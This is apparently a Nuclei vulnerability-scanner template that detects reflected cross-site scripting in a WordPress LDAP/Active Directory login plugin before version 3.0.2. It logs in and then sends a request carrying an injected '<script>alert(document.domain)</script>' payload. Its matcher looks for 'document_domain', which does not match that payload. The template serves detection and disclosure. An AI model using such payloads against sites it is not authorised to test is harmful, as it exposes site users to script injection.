id: ldap-wp-login-xss

info:
  name: Ldap WP Login / Active Directory Integration < 3.0.2 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    The plugin does not escape generated URLs before outputing them in attrubutes, leading to Reflected Cross-Site Scripting
  remediation: Fixed in version 3.0.2
  reference:
    - https://wpscan.com/vulnerability/1dc2cec8-e3dd-414b-8ccb-d73d51b051ee
  metadata:
    verified: true
    max-request: 2
  tags: xss,wp-plugin,wordpress,wp,ldap-wp-login-integration-with-active-directory,wpscan

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/admin.php?page=LDAP+authentication+intergrating+with+AD&a"><script>alert(document.domain)</script> HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(header_2, "text/html")'
          - 'contains(body_2, "<script>alert(document_domain)</script>") && contains(body_2, "LDAP-authentication-intergrating-with-AD")'
        condition: and

# digest: 4a0a0047304502200bce04c8d9eabc4702c702560e2457a66aad41c2d00028f8eaf7ae2a87237f42022100994299926a74ebd78085b7ada4602df0bf228769319370793ad5f76739c2b7a9:922c64590222798bb761d5b6d8e72950
